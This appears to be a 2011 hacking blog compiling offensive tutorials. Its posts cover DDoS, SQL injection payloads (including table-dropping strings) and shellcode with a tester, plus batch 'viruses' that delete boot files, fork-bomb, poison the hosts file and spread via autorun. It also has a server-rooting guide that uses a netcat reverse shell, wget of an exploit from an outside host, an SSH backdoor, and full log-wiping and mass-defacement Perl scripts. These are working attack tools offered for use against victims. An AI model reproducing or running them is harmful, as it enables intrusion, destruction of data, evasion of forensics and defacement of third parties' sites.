Saturday, 29 January 2011

What Is Ddos Attack And How Does It Work?




What Is Ddos Attack And How Does It Work?

Many of people in illusions that Website hacking and Attacking is very Difficult and only some hackers and professionals can Do It... Now that's absolutely wrong thinking... Its as Easy as alphabetic.


First of all We all should know What are the Different Methods Of attacking Websites...
There are Generally Three Methods of Attacking an Website...

1. Ddos Attack
2. Shell Scripts Attack

3. Javascript Attack or Attack through Scripting.

Note: SQL and other techniques comes in the Hacking Websites Part Not in attacking Part. Attacking is simply for fun or intentionally causing damage to the Website..

Ddos Attack



What is a Distributed Denial of Service (DDoS) attack?

Have you ever tried to make a telephone call but couldn't because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali,New year etcc.

The reason you couldn't get through is because the telephone system is designed to handle a limited number of calls at a time.

So upto now you will Got an Idea What is Ddos(Distibuted Denial of Service) Attack.
Basically Ddos attack is an attack which makes the Network So congested such that no further Requests are delivered.

This is Done by making a number of connections to the Websites through Different Computer or Networks. Also can be done from One Computer by making Connections through Different Ports as there are 64k ports available in Windows OS.


How Attacker Launch a Ddos Attack?

Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit twitter on 6th August 2009,lot of people had trouble on logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it.Websites like facebook, eBay etc have also been victim of this attack.

First, Attackers build a network of computers that will be used to produce the volume of traffic needed to deny services to computer users. We'll call this an "attack network".

To build this attack network, Attackers look for computers that are poorly secured, such as those that have not been properly patched, or those with out-of-date or non-existent anti-virus software. When the Attackers find such computers, they install new programs on the computers that they can remotely control to carry out the attack.

These days, however, the process of building an attack network has been automated through self-propagating programs. These programs automatically find vulnerable computers, attack them, and then install the necessary programs. The process begins again as those newly compromised computers look for still other vulnerable computers.

Once an attack network is built, the intruder is ready to attack the chosen victim or victims. Some information security experts believe that many attack networks currently exist and are dormant, passively waiting for the command to launch an attack against a victim's computers. Others believe that once a victim has been identified, the attack network is built and the attack launched soon afterward.

So guys i think this is enough for today hope you all now familer with Ddos attack in future post will we show how to do Ddos attacks with various hacking tools like Serve Attack Pro and LOIC (Low Orbit Ion Cannon) and other exploits.

and if you want to try ddos then comment here and tools wil b delievr to your inbox

Make Your Own Anonymous Email Service


Do you want to send an email anonymously because, for example, you fear your views might not be appreciated by your boss? When avouching your opinion in public — critically important under more favorable circumstances — is unhealthy, anonymity becomes vital. Here i will show you how to setup your own anonymous email service. I am writing this post because there are some things that must be said, even when the speaker must remain anonymous. Lets start:


1) First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.

2) Now open notepad and paste this PHP code: the code

because of some reason i am not going to give code here just write your email in comment and code will be sent in your mail


3) Save it everywhere u want as mail.php, then upload it in your host you created (x10hosting) via FTP.

4) Now we are done. Just go at yourname.x10hosting.com/mail.php, and start sending your fake emails.

Why sending anonymous emails is important:

* Anonymously report sensitive information to the media

* Send crime tips to law enforcement agencies anonymously

* Report wrongdoing or theft at the workplace

* Voice concerns to school principals anonymously

* Report child or any other abuse

* Initiate an anonymous chat discussion

* Share suspicions regarding a friend or loved one

What Is SQL Injection & How Does It Work



What Is SQL Injection & How Does It Work

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

SQL injection vulnerabilities have three forms:


Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

So guys I think now you should absolutely aware of what SQL injection is so in my next post we will discus how to hacks website' database or website form this method.

What is exploit and how to use it?



What is an exploit

An exploit is a computer programm, which circumvent computer security. There are many ways to exploit security holes. If a computer programmer make a programming mistake in a computer program, it is sometimes possible to circumvent security. The coding of such programs, which attack (hack) the programming mistakes or security holes is the art of exploitation or exploit coding. Some common exploiting technics are stack exploits, heap exploits, format string exploits, ...


What is an stack exploit

A stack exploit occurs, if you can write more than the size of a buffer located on the stack into this buffer. If you can write more data, as the size of the buffer (more than 1024 bytes in this example) a stack overflow occurs. For example:

main(int argc, char **argv)
{
// This buffer is located at the stack
char buf[1024];
// i is located on the stack
int i;

// A 6 byte stack buffer overflow
for(i=0;i<1030;i++) buf[i] = 'A' // Another example // if argv larger than 1024 a overflow occur strcpy(buf, argv[1]); } Why a stack overflow is a security threat ? The assembler instruction 'call' push the return address on the stack. 'call' jump into a function in our example the function is main. If the function returns with the assembler instruction 'ret', it returns to the function pointer at the stack. If you can overflow the stack you can overwrite the return address located at stack. You can return to another location. The location should a pointer to a shellcode address. Read alephonestack.txt for more information. You can download it at my papers section. What is a shellcode

Shellcode are machine instructions, which launch a shell for example. A shellcode looks like this:

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 \x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";

Every char is a machine instruction. \xcd\x80 is 'int 80' for example. After an overflow occur we need a address to return. This shellcode launch a shell. If you point to the shellcode (after a stack overflow for example), the machine instructions are launched and spawns a shell. Compile this program. It tests the shellcode and spawns a shell:

// Compile this program with gcc sctest.c -o sctest and start it: ./sctest
// now you have someting like
// sh-2.03$


#include

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\ x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";
int
main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}

read alephonestack.txt for basic shellcode coding

What are heap overflows

If the heap is overflowed a heap buffer overflow occurs.
A heap overflow looks like that:

// It dynamically create a 1000 byte buffer on the heap.
main(int argc, char **argv)
{
// pointer points to a heap address
char *pointer = malloc(1000);
char *pointer2 = malloc(200);

// Overflowed, if argv[1] is larger than 1000 bytes.
// The buffer pointer 2 is overflowed if pointer
// contains more than 1000 bytes.
strcpy(pointer, argv[1]);

// Free dynamically allocated data
free(pointer)
free(pointer2);
}


Format String exploit's ?

If you control the format string in one of the printf, syslog or setproctitle function, a exploitation is possible. Format strings are something like "%s", "%x", "%d", ... For example:

main(int argc, char **argv)
{
char *buf = "TEST";

// The wrong way
// The user can control the format string
printf(argv[1]);

// You should code:
printf("%x", argv[1]);
}

Friday, 28 January 2011

How dangerous could a batch file be?


How dangerous could a batch file be?

Hi freinds, today we could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, we have focused on making the basics of batch files clear and developing the approach to code your own viruses.


What are Batch Files?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'


Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat


Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder

@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

4.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

5. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.


6. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .


7. Extension Changer

@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything


Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wouldn’t open properly.


8. DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.


Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.

2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
first download this Batch To Exe coverter with the help of goggling .

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Thursday, 27 January 2011

ROOTING LINUX SERVERS


# Title: Rooting Linux Servers for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH

# Introduction- Hello All, This My second paper after Sql Injection. My first was much
successful :) thanks
to all for all those Lovely compliments. This paper will not be so long as my first one was
of 14 pages :D.
Let's Start,
# Things you need-
=> A Shell on a website
=> An Exploit
=> Log cleaner
=> Ssh Backdoor
=> Netcat
=> A Brain
=> Get these from Google ;) lolz
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting Juicy info :)
Now I begin,
# Getting Backconnection to the server-
=> Copy the Netcat directory to C:\
=> Open command prompt, type: CD C:\NETCAT
It'll look like this:
[code]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ash>cd c:\netcat
c:\netcat>
[/code]
=> Now Type: nc -l -v -p 2121
It'll look like-
[code]
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
-1-


[/code]
=> Open your Shell in your browser, go to the backconnection tab, if it is not there get a
shell like "B374k" or Any other
thats your choice.
=> Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you
can give commands to the server through that shell.
# Getting a Right exploit for the server-
=> Type : Uname -a & hit enter.
It'll look something like this:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux
[/code]
=> It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
=> You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# Compiling & executing exploit-
=> Now I've got a exploit, & it is written in C. So I can't execute it by just uploading.
but I need to compile it.
=> Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
=> So first I'll get the exploit on the server, So I type : Wget
http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `exploit.c' saved [15088/15088]
[/code]
-2-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
=> now change the permission of the exploit to 777.
Type: Chmod 777 exploit.c
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ chmod 777 ImpelDown.c
[/code]
=> Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as => exploit
It may look like-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o exploit exploit.c
[/code]
=> Next step is to execute it So we'll type: ./exploit
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o ImpelDown.c
got root you m0f0 !!
[/code]
=> Now it say got root. Let's Check is it true,
Type: id
It may look like
[code]
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
[/code]
=> Which Means I got root :)
# Installing Backdoor-
=> type- Wget urlofbackdoor.com/sshdoor.zip
=> Then Type,
Unzip Sshdoor.zip
=> Then type, ./run pass port
^ replace pass with your password, & a port.
=> Now connect with putty & enjoy root privileges. ;)
##################################################################################
=> Methods to execute exploits written in other languages-
-3-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
#C exploitgcc
-o exploit exploit.c
chmod +x exploit
./exploit
#Perlperl
exploit.pl
#pythonpython
exploit.py
#phpphp
exploit.php
#zip
unzip exploit.zip
./run
##################################################################################
=> Cleaning Logs-
# you can use my log cleaner to clear your track :D. It is written in perl. save it as
anything.pl
& to execute type: perl anything.pl
here is the code-
[perl]
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE - YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
-4-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
}
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
-5-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
=> Mass deface- I've a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
-6-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "\033[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} \;";
system "find / -name "main*" -exec cp $index {} \;";
system "find / -name "home*" -exec cp $index {} \;";
system "find / -name "default*" -exec cp $index {} \;";
system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";
system "echo -e "\033[01;37m----------------------------------------------------------"n";
system "echo -e "\033[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";
}
-7-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
else
{
system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";
}
else
-8-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";
-9-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";
}
-10-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file or
directory\033[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file or
directory\033[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";
}
if( -e "/root/.ksh_history" )
-11-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system 'rm -rf /root/.ksh_history';
system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";
}
system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";
system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";
system 'find / -name "log*" -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";
system 'find / -name *.log -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";
system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found
!\033[01;37m"n";
exit;
}
-12-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
else
{
system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";
system "echo -e "\033[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "\033[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/code]
##################################################################################
=> Important Commands-
./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
